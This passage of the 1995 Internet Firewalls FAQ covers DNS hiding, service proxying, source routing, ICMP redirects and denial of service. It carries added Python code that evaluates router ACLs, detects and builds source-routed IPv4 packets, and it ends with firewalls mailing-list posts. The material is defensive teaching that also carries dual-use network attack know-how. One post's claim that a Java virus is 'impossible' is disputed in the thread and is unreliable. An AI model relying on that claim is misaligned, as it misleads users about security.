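    for r in rules:
        if r.list_id != list_id:
            continue
        if r.proto != "ip" and r.proto != proto:
            continue
        if not (_wild_match(s, r.src, r.src_wild) and _wild_match(d, r.dst, r.dst_wild)):
            continue
        if r.port_op is not None:
            if dport is None:
                continue
            hit = {"lt": dport < r.port, "gt": dport > r.port, "eq": dport == r.port}[r.port_op]
            if not hit:
                continue
        if r.established and not ack_or_rst:
            continue
        return r.action, r
    return "deny", None


RULES = parse_acl(FAQ_ACL)


def shadowed_smtp_deny() -> bool:
    """True if list 11's 'deny tcp ... eq 25' is unreachable for a blue net host,
    because the earlier 'permit ip' line already matched the packet."""
    action, rule = evaluate(RULES, "11", "tcp", "128.88.1.5", "192.0.2.7", dport=25)
    return action == "permit" and rule is not None and rule.proto == "ip"


if __name__ == "__main__":
    for args in [("10", "tcp", "192.0.2.7", "128.88.1.5", 1024),
                 ("10", "tcp", "192.0.2.7", "128.88.1.5", 1025),
                 ("10", "tcp", "192.0.2.7", "128.88.1.5", 5000),
                 ("10", "udp", "128.88.254.2", "128.88.1.5", 53),
                 ("11", "tcp", "128.88.1.5", "192.0.2.7", 25)]:
        action, rule = evaluate(RULES, *args)
        print(args, "->", action, "(implicit deny)" if rule is None else "via: " + rule.text)
```

Running it shows the port window the explanation describes: a connection from the red net to port 1024 or 5000 on a blue host is denied, 1025 through 4999 is permitted, and anything that is not TCP and does not come from the gateway falls off the end of list 10 into the implicit deny. It also shows a consequence of first-match evaluation worth checking on any list: as quoted, line 16 permits all IP from 128.88.0.0/16 to any destination, so a blue net TCP packet to port 25 matches it before line 17 is reached; for line 17 to have the effect the explanation gives it, line 16's destination would have to be the gateway address rather than 0.0.0.0 255.255.255.255.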
Many Web clients have proxy server support (Netscape, Mosaic, Spry, Chameleon, etc) built directly into them.

How do I make DNS work with a firewall?

Some organizations want to hide DNS names from the outside. Many experts don't think hiding DNS names is worthwhile, but if site/corporate policy mandates hiding domain names, this is one approach that is known to work. Another reason you may have to hide domain names is if you have a non-standard addressing scheme on your internal network. In that case, you have no choice but to hide those addresses. Don't fool yourself into thinking that if your DNS names are hidden that it will slow an attacker down much if they break into your firewall. Information about what is on your network is too easily gleaned from the networking layer itself. If you want an interesting demonstration of this, ping the subnet broadcast address on your LAN and then do an "arp -a." Note also that hiding names in the DNS doesn't address the problem of host names "leaking" out in mail headers, news articles, etc.

This approach is one of many, and is useful for organizations that wish to hide their host names from the Internet. The success of this approach lies on the fact that DNS clients on a machine don't have to talk to a DNS server on that same machine. In other words, just because there's a DNS server on a machine, there's nothing wrong with (and there are often advantages to) redirecting that machine's DNS client activity to a DNS server on another machine.

First, you set up a DNS server on the bastion host that the outside world can talk to. You set this server up so that it claims to be authoritative for your domains. In fact, all this server knows is what you want the outside world to know; the names and addresses of your gateways, your wildcard MX records, and so forth. This is the "public" server.

Then, you set up a DNS server on an internal machine.
This server also claims to be authoritative for your domains; unlike the public server, this one is telling the truth. This is your "normal" nameserver, into which you put all your "normal" DNS stuff. You also set this server up to forward queries that it can't resolve to the public server (using a "forwarders" line in /etc/named.boot on a UNIX machine, for example).

Finally, you set up all your DNS clients (the /etc/resolv.conf file on a UNIX box, for instance), including the ones on the machine with the public server, to use the internal server. This is the key.

An internal client asking about an internal host asks the internal server, and gets an answer; an internal client asking about an external host asks the internal server, which asks the public server, which asks the Internet, and the answer is relayed back. A client on the public server works just the same way. An external client, however, asking about an internal host gets back the "restricted" answer from the public server.

This approach assumes that there's a packet filtering firewall between these two servers that will allow them to talk DNS to each other, but otherwise restricts DNS between other hosts.

Another trick that's useful in this scheme is to employ wildcard PTR records in your IN-ADDR.ARPA domains. These cause an address-to-name lookup for any of your non-public hosts to return something like "unknown.YOUR.DOMAIN" rather than an error. This satisfies anonymous FTP sites like ftp.uu.net that insist on having a name for the machines they talk to. This may fail when talking to sites that do a DNS cross-check in which the host name is matched against its address and vice versa.

How do I make FTP work through my firewall?

Generally, making FTP work through the firewall is done either using a proxy server such as the firewall toolkit's ftp-gw or by permitting incoming connections to the network at a restricted port range, and otherwise restricting incoming connections using something like "established" screening rules. The FTP client is then modified to bind the data port to a port within that range. This entails being able to modify the FTP client application on internal hosts.

In some cases, if FTP downloads are all you wish to support, you might want to consider declaring FTP a "dead protocol" and letting your users download files via the Web instead. The user interface certainly is nicer, and it gets around the ugly callback port problem. If you choose the FTP-via-Web approach, your users will be unable to FTP files out, which, depending on what you are trying to accomplish, may be a problem.

A different approach is to use the FTP "PASV" option to indicate that the remote FTP server should permit the client to initiate connections. The PASV approach assumes that the FTP server on the remote system supports that operation. (See RFC1579 for more information.)

Other sites prefer to build client versions of the FTP program that are linked against a SOCKS library.

How do I make Telnet work through my firewall?

Telnet is generally supported either by using an application proxy such as the firewall toolkit's tn-gw, or by simply configuring a router to permit outgoing connections using something like the "established" screening rules. Application proxies could be in the form of a standalone proxy running on the bastion host, or in the form of a SOCKS server and a modified client.

How do I make Finger and whois work through my firewall?

Many firewall admins permit connections to the finger port from only trusted machines, which can issue finger requests in the form of: finger user@host.domain@firewall. This approach only works with the standard UNIX version of finger.
Controlling access to services and restricting them to specific machines is managed using either tcp_wrappers or netacl from the firewall toolkit. This approach will not work on all systems, since some finger servers do not permit user@host@host fingering.

Many sites block inbound finger requests for a variety of reasons, foremost being past security bugs in the finger server (the Morris internet worm made these bugs famous) and the risk of proprietary or sensitive information being revealed in user's finger information. In general, however, if your users are accustomed to putting proprietary or sensitive information in their .plan files, you have a more serious security problem than just a firewall can solve.

How do I make gopher, archie, and other services work through my firewall?

The majority of firewall administrators choose to support gopher and archie through Web proxies, instead of directly. Proxies such as the firewall toolkit's http-gw convert gopher/gopher+ queries into HTML and vice versa. For supporting archie and other queries, many sites rely on Internet-based Web-to-archie servers, such as ArchiePlex. The Web's tendency to make everything on the Internet look like a Web service is both a blessing and a curse.

There are many new services constantly cropping up. Often they are misdesigned or are not designed with security in mind, and their designers will cheerfully tell you if you want to use them you need to let port xxx through your router. Unfortunately, not everyone can do that, and so a number of interesting new toys are difficult to use for people behind firewalls. Things like RealAudio, which require direct UDP access, are particularly egregious examples. The thing to bear in mind if you find yourself faced with one of these problems is to find out as much as you can about the security risks that the service may present, before you just allow it through. It's quite possible the service has no security implications.
It's equally possible that it has undiscovered holes you could drive a truck through.

What are the issues about X-Window through a firewall?

X Windows is a very useful system, but unfortunately has some major security flaws. Remote systems that can gain or spoof access to a workstation's X display can monitor keystrokes that a user enters, download copies of the contents of their windows, etc. While attempts have been made to overcome them (e.g., MIT "Magic Cookie") it is still entirely too easy for an attacker to interfere with a user's X display. Most firewalls block all X traffic. Some permit X traffic through application proxies such as the DEC CRL X proxy (FTP crl.dec.com). The firewall toolkit includes a proxy for X, called x-gw, which a user can invoke via the Telnet proxy, to create a virtual X server on the firewall. When requests are made for an X connection on the virtual X server, the user is presented with a pop-up asking them if it is OK to allow the connection. While this is a little unaesthetic, it's entirely in keeping with the rest of X.

What is source routed traffic and why is it a threat?

Normally, the route a packet takes from its source to its destination is determined by the routers between the source and destination. The packet itself only says where it wants to go (the destination address), and nothing about how it expects to get there. There is an optional way for the sender of a packet (the source) to include information in the packet that tells the route the packet should take to its destination; thus the name "source routing".

For a firewall, source routing is noteworthy, since an attacker can generate traffic claiming to be from a system "inside" the firewall. In general, such traffic wouldn't route to the firewall properly, but with the source routing option, all the routers between the attacker's machine and the target will return traffic along the reverse path of the source route.
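A screening device that is told to drop source-routed traffic is doing nothing more than looking at the IP options area of each header for the loose (LSRR, option type 131) and strict (SSRR, option type 137) source route options. The following Python parser is an added example for this page, not from the FAQ and not from any router vendor; it walks the options area of an IPv4 header, reports any source route it finds together with the hop addresses the sender asked for, and treats a header whose options cannot be parsed as something to drop as well. The packets are constructed inline for the example, using addresses from the TEST-NET range and the FAQ's 128.88.0.0 example network, with the header checksum left at zero.

```python
# Added example: detect the IPv4 loose/strict source route options, the check a
# screening router or bastion host makes when it "drops source-routed packets".
# Not from the FAQ; the sample packets below are constructed for this example.
import struct
import ipaddress
from typing import List, Optional, Tuple

IPOPT_EOL, IPOPT_NOP = 0, 1
IPOPT_LSRR, IPOPT_SSRR = 131, 137     # 0x83 loose and 0x89 strict source and record route


def parse_ipv4_options(packet: bytes) -> List[Tuple[int, bytes]]:
    """Return (type, body) pairs from the options area of an IPv4 header."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        raise ValueError("not an IPv4 header")
    ihl = (packet[0] & 0x0F) * 4      # header length in bytes, 20..60
    if ihl < 20 or len(packet) < ihl:
        raise ValueError("header length field is inconsistent with the data")
    opts = packet[20:ihl]
    found, i = [], 0
    while i < len(opts):
        kind = opts[i]
        if kind == IPOPT_EOL:
            break                      # end of option list; the rest is padding
        if kind == IPOPT_NOP:
            i += 1
            continue
        if i + 1 >= len(opts):
            raise ValueError("option header runs past the end of the options area")
        length = opts[i + 1]
        if length < 2 or i + length > len(opts):
            raise ValueError("bad option length")   # malformed: unparseable, not benign
        found.append((kind, opts[i + 2:i + length]))
        i += length
    return found


def source_route(packet: bytes) -> Optional[Tuple[str, List[str]]]:
    """Return ("loose"|"strict", [hop addresses]) if the packet is source routed, else None."""
    for kind, body in parse_ipv4_options(packet):
        if kind in (IPOPT_LSRR, IPOPT_SSRR):
            addrs = body[1:]           # first body byte is the route pointer, then 4-byte hops
            hops = [str(ipaddress.IPv4Address(addrs[j:j + 4]))
                    for j in range(0, len(addrs) - len(addrs) % 4, 4)]
            return ("strict" if kind == IPOPT_SSRR else "loose"), hops
    return None


def should_drop(packet: bytes) -> bool:
    """The FAQ's policy: do not accept source-routed traffic. A header whose
    options cannot be parsed is dropped too rather than waved through."""
    try:
        return source_route(packet) is not None
    except ValueError:
        return True


def build_ipv4(src: str, dst: str, options: bytes = b"", payload: bytes = b"") -> bytes:
    """Constructed sample packets for testing; the header checksum is left at zero."""
    opts = options + b"\x00" * (-len(options) % 4)   # pad options to a 32-bit boundary
    ihl = 5 + len(opts) // 4
    header = struct.pack("!BBHHHBBH4s4s", (4 << 4) | ihl, 0, 20 + len(opts) + len(payload),
                         0, 0, 64, 6, 0,
                         ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return header + opts + payload


# Constructed samples: a plain packet and one carrying an LSRR option naming two
# hops. LSRR layout: type, length (3 + 4 per hop), pointer (4 = first hop), hops.
_LSRR = (bytes([IPOPT_LSRR, 3 + 8, 4])
         + ipaddress.IPv4Address("192.0.2.9").packed
         + ipaddress.IPv4Address("128.88.254.2").packed)
SAMPLE_PLAIN = build_ipv4("192.0.2.7", "128.88.1.5")
SAMPLE_SOURCE_ROUTED = build_ipv4("192.0.2.7", "128.88.1.5", options=_LSRR)

if __name__ == "__main__":
    print("plain:", source_route(SAMPLE_PLAIN), "drop:", should_drop(SAMPLE_PLAIN))
    print("lsrr:", source_route(SAMPLE_SOURCE_ROUTED), "drop:", should_drop(SAMPLE_SOURCE_ROUTED))
```

The same walk over the options area is what a kernel does when configured to ignore source-routed traffic; the only policy decision here is the one in should_drop, where malformed option lists are rejected instead of being treated as "no options".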
Implementing such an attack is quite easy; so firewall builders should not discount it as unlikely to happen. In practice, source routing is very little used. In fact, generally the main legitimate use is in debugging network problems or routing traffic over specific links for congestion control for specialized situations. When building a firewall, source routing should be blocked at some point. Most commercial routers incorporate the ability to block source routing specifically, and many versions of UNIX that might be used to build firewall bastion hosts have the ability to disable or ignore source routed traffic.

What are ICMP redirects and redirect bombs?

An ICMP Redirect tells the recipient system to override something in its routing table. It is legitimately used by routers to tell hosts that the host is using a non-optimal or defunct route to a particular destination, i.e. the host is sending it to the wrong router. The wrong router sends the host back an ICMP Redirect packet that tells the host what the correct route should be. If you can forge ICMP Redirect packets, and if your target host pays attention to them, you can alter the routing tables on the host and possibly subvert the security of the host by causing traffic to flow via a path the network manager didn't intend. ICMP Redirects also may be employed for denial of service attacks, where a host is sent a route that loses its connectivity, or is sent an ICMP Network Unreachable packet telling it that it can no longer access a particular network.

Many firewall builders screen ICMP traffic from their network, since it limits the ability of outsiders to ping hosts, or modify their routing tables.

What about denial of service?

Denial of service is when someone decides to make your network or firewall useless by disrupting it, crashing it, jamming it, or flooding it. The problem with denial of service on the Internet is that it is impossible to prevent.
The reason has to do with the distributed nature of the network: every network node is connected via other networks which in turn connect to other networks, etc. A firewall administrator or ISP only has control of a few of the local elements within reach. An attacker can always disrupt a connection "upstream" from where the victim controls it. In other words, if someone wanted to take a network off the air, they could do it either by taking the network off the air, or by taking the networks it connects to off the air, ad infinitum.

There are many, many, ways someone can deny service, ranging from the complex to the brute-force. If you are considering using Internet for a service which is absolutely time or mission critical, you should consider your fall-back position in the event that the network is down or damaged.

Glossary of firewall related terms

Abuse of Privilege: When a user performs an action that they should not have, according to organizational policy or law.

Application-Level Firewall: A firewall system in which service is provided by processes that maintain complete TCP connection state and sequencing. Application level firewalls often re-address traffic so that outgoing traffic appears to have originated from the firewall, rather than the internal host.

Authentication: The process of determining the identity of a user that is attempting to access a system.

Authentication Token: A portable device used for authenticating a user. Authentication tokens operate by challenge/response, time-based code sequences, or other techniques. This may include paper-based lists of one-time passwords.

Authorization: The process of determining what types of activities are permitted. Usually, authorization is in the context of authentication: once you have authenticated a user, they may be authorized different types of access or activity.

Bastion Host: A system that has been hardened to resist attack, and which is installed on a network in such a way that it is expected to potentially come under attack. Bastion hosts are often components of firewalls, or may be "outside" Web servers or public access systems. Generally, a bastion host is running some form of general purpose operating system (e.g., UNIX, VMS, WNT, etc.) rather than a ROM-based or firmware operating system.

Challenge/Response: An authentication technique whereby a server sends an unpredictable challenge to the user, who computes a response using some form of authentication token.

Chroot: A technique under UNIX whereby a process is permanently restricted to an isolated subset of the filesystem.

Cryptographic Checksum: A one-way function applied to a file to produce a unique "fingerprint" of the file for later reference. Checksum systems are a primary means of detecting filesystem tampering on UNIX.

Data Driven Attack: A form of attack in which the attack is encoded in innocuous-seeming data which is executed by a user or other software to implement an attack. In the case of firewalls, a data driven attack is a concern since it may get through the firewall in data form and launch an attack against a system behind the firewall.

Defense in Depth: The security approach whereby each system on the network is secured to the greatest possible degree. May be used in conjunction with firewalls.

DNS spoofing: Assuming the DNS name of another system by either corrupting the name service cache of a victim system, or by compromising a domain name server for a valid domain.

Dual Homed Gateway: A dual homed gateway is a system that has two or more network interfaces, each of which is connected to a different network. In firewall configurations, a dual homed gateway usually acts to block or filter some or all of the traffic trying to pass between the networks.

Encrypting Router: see Tunneling Router and Virtual Network Perimeter.
Firewall: A system or combination of systems that enforces a boundary between two or more networks. Host-based Security: The technique of securing an individual system from attack. Host based security is operating system and version dependent. Insider Attack: An attack originating from inside a protected network. Intrusion Detection: Detection of break-ins or break-in attempts either manually or via software expert systems that operate on logs or other information available on the network. IP Spoofing: An attack whereby a system attempts to illicitly impersonate another system by using its IP network address. IP Splicing / Hijacking: An attack whereby an active, established, session is intercepted and co-opted by the attacker. IP Splicing attacks may occur after an authentication has been made, permitting the attacker to assume the role of an already authorized user. Primary protections against IP Splicing rely on encryption at the session or network layer. Least Privilege: Designing operational aspects of a system to operate with a minimum amount of system privilege. This reduces the authorization level at which various actions are performed and decreases the chance that a process or user with high privileges may be caused to perform unauthorized activity resulting in a security breach. Logging: The process of storing information about events that occurred on the firewall or network. Log Retention: How long audit logs are retained and maintained. Log Processing: How audit logs are processed, searched for key events, or summarized. Network-Level Firewall: A firewall in which traffic is examined at the network protocol packet level. Perimeter-based Security: The technique of securing a network by controlling access to all entry and exit points of the network. Policy: Organization-level rules governing acceptable use of computing resources, security practices, and operational procedures. Proxy: A software agent that acts on behalf of a user. 
Typical proxies accept a connection from a user, make a decision as to whether or not the user or client IP address is permitted to use the proxy, perhaps does additional authentication, and then completes a connection on behalf of the user to a remote destination. Screened Host: A host on a network behind a screening router. The degree to which a screened host may be accessed depends on the screening rules in the router. Screened Subnet: A subnet behind a screening router. The degree to which the subnet may be accessed depends on the screening rules in the router. Screening Router: A router configured to permit or deny traffic based on a set of permission rules installed by the administrator. Session Stealing: See IP Splicing. Trojan Horse: A software entity that appears to do something normal but which, in fact, contains a trapdoor or attack program. Tunneling Router: A router or system capable of routing traffic by encrypting it and encapsulating it for transmission across an untrusted network, for eventual de-encapsulation and decryption. Social Engineering: An attack based on deceiving users or administrators at the target site. Social engineering attacks are typically carried out by telephoning users or operators and pretending to be an authorized user, to attempt to gain illicit access to systems. Virtual Network Perimeter: A network that appears to be a single protected network behind firewalls, which actually encompasses encrypted virtual links over untrusted networks. Virus: A self-replicating code segment. Viruses may or may not contain attack programs or trapdoors. Contributors: * Primary Author: mjr@iwi.com - Marcus Ranum, Information Warehouse! * Cisco Config: allen@msen.com - Allen Leibowitz * DNS Hints: brent@greatcircle.com - Brent Chapman, Great Circle Associates * Policy Brief: bdboyle@erenj.com - Brian Boyle, Exxon Research Copyright(C) 1995 Marcus J. Ranum. All rights reserved. 
This document may be used, reprinted, and redistributed as is providing this copyright notice and all attributions remain intact.

From firewalls-owner Fri Sep 15 14:32:08 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27503 for firewalls-outgoing; Fri, 15 Sep 1995 14:21:56 -0700
Received: from pondscum.phx.mcd.mot.com (pondscum.phx.mcd.mot.com [144.191.36.6]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA27489 for ; Fri, 15 Sep 1995 14:21:47 -0700
Received: from pondscum.phx.mcd.mot.com (localhost [127.0.0.1]) by pondscum.phx.mcd.mot.com (8.6.8.p4/8.6.3.pondscum) with ESMTP id OAA19001; Fri, 15 Sep 1995 14:16:56 -0700
Message-Id: <199509152116.OAA19001@pondscum.phx.mcd.mot.com>
To: firewalls@greatcircle.com
Cc: cmcmanis@scndprsn.eng.sun.com (Chuck McManis)
Subject: Re: I wish Java would go away ...
In-reply-to: Your message of "Fri, 15 Sep 1995 10:38:42 MST." <9509151738.AA19548@pepper.Eng.Sun.COM>
Date: Fri, 15 Sep 1995 14:16:53 -0700
From: Kevin Johnson
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>>>>> Chuck McManis writes:
> Scott writes:
>> I was wondering if anyone has done a security analysis of allowing
>> Java applets behind a firewall?
> And the answer is of course yes. We plan to have a more thorough
> security analysis paper available for FCS. In the meantime we
> welcome other analyses and comments.

Can you please provide a pointer to existing security analysis documentation for those of us that haven't had a chance to go scrounging for it.

>> (b) I saw a lot of stuff regarding these applets and Unix, but what
>> if the client machines are pee cees? The NT and Windoze 95 weenies
>> are jumping up and down going "oooo neat!" I'm still responding
>> "oy vey!" :-)
> Interestingly enough the language is the same on PCs as it is on
> UNIX. It is still impossible to express a virus in Java, and it is
> still impossible to cons up some illegal byte codes and have them
> executed by the virtual machine on the other end. If you have any
> specific concerns I can address then please feel free to write or
> post to the java lists.

'impossible' is such an interesting word to fling around security folks...

Please provide a pointer to information that details how it is 'impossible to express a virus'.

--
thx, kjj

From firewalls-owner Fri Sep 15 14:32:45 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27263 for firewalls-outgoing; Fri, 15 Sep 1995 14:18:35 -0700
Received: from uucp-1.csn.net (uucp-1.csn.net [199.117.27.26]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA27251 for ; Fri, 15 Sep 1995 14:18:28 -0700
Received: from bacchus.UUCP (uucp@localhost) by uucp-1.csn.net (8.6.12/8.6.12) with UUCP id OAA18185 for greatcircle.com!Firewalls; Fri, 15 Sep 1995 14:10:41 -0600
From: Shawn Steele
Message-Id: <9509151323.ZM4018@aob.org>
Date: Fri, 15 Sep 1995 13:23:06 -0600
In-Reply-To: firewalls-digest-owner@greatcircle.com "Firewalls-Digest V4 #530" (Sep 15, 9:03am)
References: <199509151603.JAA08002@miles.greatcircle.com>
X-Mailer: Z-Mail Lite (3.2.0 26may94)
To: Firewalls@greatcircle.com
Subject: Re: Any known security holes in the "vacation" program
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> sjs writes:
> > I'm trying to set up an auto-responder for a couple of mail
> > aliases on my mailhost. For the moment, because I don't really want
> > to get involved with majordomo or any of the other mail list
> > programs, I am using the simple functionality of the
> > "/usr/ucb/vacation" program under SunOS 4.1.x.
>
> I wouldn't recommend it. vacation can write to files in the users
> home directory writing an rhosts entry jumps to mind.

If all you are looking for is an auto-responder, it usually isn't very difficult to create a small program to scan for From: & Reply-To: addresses and send a preformatted response. You'd have the advantages that the code would be small and also fairly unknown to any potential hacker types out there.

- shawn

Shawn Steele
Information Systems Administrator
Association of Brewers
736 Pearl Street, PO Box 1679, Boulder, CO 80306-1679, U.S.A.
(303) 447-0816 x 118 (voice)
(303) 447-2825 (fax)
shawn@aob.org (e-mail)
info@aob.org (aob info)
http://www.aob.org/aob (web)

Note: When replying to my messages, please include enough of my message so that I know what you're replying to! :-)

From firewalls-owner Fri Sep 15 15:01:44 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA00136 for firewalls-outgoing; Fri, 15 Sep 1995 14:52:40 -0700
Received: from london.micrognosis.com (midas.london.micrognosis.com [193.114.123.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA00126 for ; Fri, 15 Sep 1995 14:52:35 -0700
Received: by london.micrognosis.com (4.1/NAR-Gateway) id AA01516; Fri, 15 Sep 95 22:51:17 BST
Received: from zeus.london.micrognosis.com(192.83.165.17) by midas via smap (V1.0mjr) id sma001511; Fri Sep 15 22:50:47 1995
Received: by zeus.london.micrognosis.com (4.1/SMI-4.1) id AA14249; Fri, 15 Sep 95 22:50:44 BST
From: nreadwin@london.micrognosis.com (Neil Readwin)
Message-Id: <9509152150.AA14249@zeus.london.micrognosis.com>
Subject: Re: Any known security holes in the "vacation" program
To: yevaud@netcom.com (Karl Wiebe)
Date: Fri, 15 Sep 1995 22:50:43 +0100 (BST)
Cc: firewalls@greatcircle.com
In-Reply-To: <199509151653.JAA18708@netcom21.netcom.com> from "Karl Wiebe" at Sep 15, 95 09:53:51 am
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 704
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> >[...] the "/usr/ucb/vacation" program under SunOS 4.1.x.
>
> One reason is simply that vacation, being designed for the simple "I'm on
> vacation" setup, will only respond *once* to email from a given address;
> this is why it maintains its "database".

But it only maintains the database if you create it first. Otherwise it replies to every mail. Try it - set up a 'dead' account and change the .forward to run vacation. Ignore for weeks until a cron job for the account sends mail to the owner. Notice how rapidly /var/log fills up with sendmail syslog output.

Neil.
--
nreadwin@micrognosis.co.uk Phone: +1 908 855 1221 x519
Anything is a cause for sorrow that my mind or body has made

From firewalls-owner Fri Sep 15 15:02:58 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA29984 for firewalls-outgoing; Fri, 15 Sep 1995 14:51:34 -0700
Received: from stilton.cisco.com (stilton.cisco.com [171.69.1.161]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA29933 for ; Fri, 15 Sep 1995 14:51:20 -0700
Received: from cisco.com (localhost.cisco.com [127.0.0.1]) by stilton.cisco.com (8.6.8+c/8.6.5) with ESMTP id OAA21399; Fri, 15 Sep 1995 14:49:45 -0700
Message-Id: <199509152149.OAA21399@stilton.cisco.com>
To: mramirez@imparcial.com.mx
Cc: firewalls@GreatCircle.COM
Subject: Re: Help with CISCO 2511
In-Reply-To: Your message of "Tue, 12 Sep 1995 22:39:43 MDT."
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Id: <21396.811201785.1@cisco.com>
Date: Fri, 15 Sep 1995 14:49:45 -0700
From: David Carrel
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

What they wanted to tell you (or meant to tell you, or tried to tell you) is that you need to set the lines on the 2511 to a speed higher than 9600. The default speed is 9600. Check out your manual and find out what the maximum DTE speed is for the modem. It's probably 57600 baud.
Then configure that on the 2511 for all lines:

    config# line tty 1 16
    config-line# speed 57600

The modems will then talk at 57600 to the 2511. The modems will never negotiate a speed higher than the DTE speed.

Dave

> I have a CISCO 2511, with 10 modems connected (Hayes Accura 144 + 14400 FAX).
> I'm having problems trying to configure the receiving modems to support
> 14,400 bps from the callers.
> Actually my users only can connect to the modems at 9600 bps, and the
> technical support from CISCO told me that I have to change my modems to
> 28,800 bps, that's the only way that my receiving modems can receive calls
> at 14,400 bps.
> It's true?? , because I think that is some problem with the configuration
> of the CISCO (in dedicated or interactive mode)

From firewalls-owner Fri Sep 15 15:30:23 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA27998 for firewalls-outgoing; Fri, 15 Sep 1995 14:29:45 -0700
Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id OAA27985 for ; Fri, 15 Sep 1995 14:29:39 -0700
Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA17081; Fri, 15 Sep 95 17:04:48 -0400
Date: Fri, 15 Sep 95 17:04:48 -0400
Message-Id: <9509152104.AA17081@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Multiple Levels of Security
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Mark writes:
>-----------------
1) strong authentication and identification
2) session security (could be encryption either at the link or session level)
3) perimeter LAN security firewalls around the LAN perimeter.
4) application level security:
   - language support for security
   - application level auditing
   - secure databases
5) host security
   - system level auditing
   - compartmentalization of applications
   - protection of user from user
   - protection of application from application
   - protection of underlying OS
   - intrusion detection
6) physical security of plant/property & equipment
7) security training of personnel (essential)
>-----------------------------------

Good separation and I agree with universal needs for 1-3 and 6-7 but relegate 4 & 5 to an "as needed" basis. Is a matter of resources. I can see where a small organization may be able to handle all of these elements but it is just not possible for a large organization to provide 4 & 5 to every workstation. As a result, I have found it necessary to manage large groups of systems at the subnet/department/project level and allow the group autonomy within that boundary.

The concept of a "perimeter defense" is based on defining a defensible perimeter given the current assets. Squares/rectangles are the usual choice because they allow redundant control to be placed at the corners *with the least expended manpower*. As anyone who has been in the field knows, you do the best you can with what you have. Strategic planning is not done while carrying out tactical operations (beyond "I ain't gonna do THAT again.")

Now I have never said that internal protection is unnecessary, really have not had that much time to go into it since without a strong perimeter, internal patrolling is not going to help much. There is a place for an internal patrol/protection but it is much different and has the *luxury* of a different mindset than necessary on the walls. Diplomacy is possible.

Have said for some time that it is possible to have trusted subnets that have the function of a bastion while residing "inside". On these 4 & 5 are applicable. But first a strong perimeter is needed.

Warmly,
Padgett

From firewalls-owner Fri Sep 15 15:40:56 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02040 for firewalls-outgoing; Fri, 15 Sep 1995 15:24:56 -0700
Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA02032 for ; Fri, 15 Sep 1995 15:24:51 -0700
Received: from Eng.Sun.COM by mercury.Sun.COM (Sun.COM) id PAA28031; Fri, 15 Sep 1995 15:23:25 -0700
Received: from scndprsn.Eng.Sun.COM by Eng.Sun.COM (5.x/SMI-5.3) id AA04536; Fri, 15 Sep 1995 15:23:20 -0700
Received: from pepper.Eng.Sun.COM by scndprsn.Eng.Sun.COM (5.x/SMI-SVR4) id AA15941; Fri, 15 Sep 1995 15:23:19 -0700
Received: by pepper.Eng.Sun.COM (5.x/SMI-SVR4) id AA20137; Fri, 15 Sep 1995 15:24:15 -0700
Date: Fri, 15 Sep 1995 15:24:15 -0700
From: cmcmanis@scndprsn.Eng.Sun.COM (Chuck McManis)
Message-Id: <9509152224.AA20137@pepper.Eng.Sun.COM>
To: firewalls@greatcircle.com, kjj@pondscum.phx.mcd.mot.com
Subject: Re: I wish Java would go away ...
Cc: cmcmanis@scndprsn.Eng.Sun.COM
X-Sun-Charset: US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>> And the answer is of course yes. We plan to have a more thorough
>> security analysis paper available for FCS. In the meantime we
>> welcome other analyses and comments.
>
>Can you please provide a pointer to existing security analysis
>documentation for those of us that haven't had a chance to go
>scrounging for it.

Let me restate what I said, our security analyses of the system will be available from our home page. However, Scott (and others) seemed to indicate they were interested in NON-Sun analysis (since we are of course biased). Several third parties have said they would be analyzing our security, but unfortunately no one has yet shared this analysis with us. (Well one party did but they expressly asked that their analysis be kept confidential for non-security related reasons)

>'impossible' is such an interesting word to fling around security
>folks...

On the contrary it is exactly the word to use. Most security experts will choose to take the hypothesis "It is possible to write a virus in Java" and then try to prove it. I for one am interested in all such attempts to prove this and will help with any information I can provide. Were it actually possible we'd be stupid not to change Java instantly to prevent it.

>Please provide a pointer to information that details how it is
>'impossible to express a virus'.

There is the Java language spec that is online at http://java.sun.com and soon there will be a YACC grammar for folks to play with. Let me sketch it out for you and that at least may help guide your investigations.

The Java language is *strongly* typed, unlike C or C++. It has *no* type loopholes unlike PASCAL, Modula-2, etc. The ability to create a pointer is a closely held capability. Only the runtime can create pointers (references in Java) and when created pointers are indelibly marked with their type. All casts are checked for typing violations. The closest thing Java has to anonymous memory is arrays, however arrays are arrays of refs or scalars, and in all cases types are checked and index bounds are checked when dealing with arrays. Arithmetic on pointers (references) is not possible. (No byte code support for it, no compiler support for it)

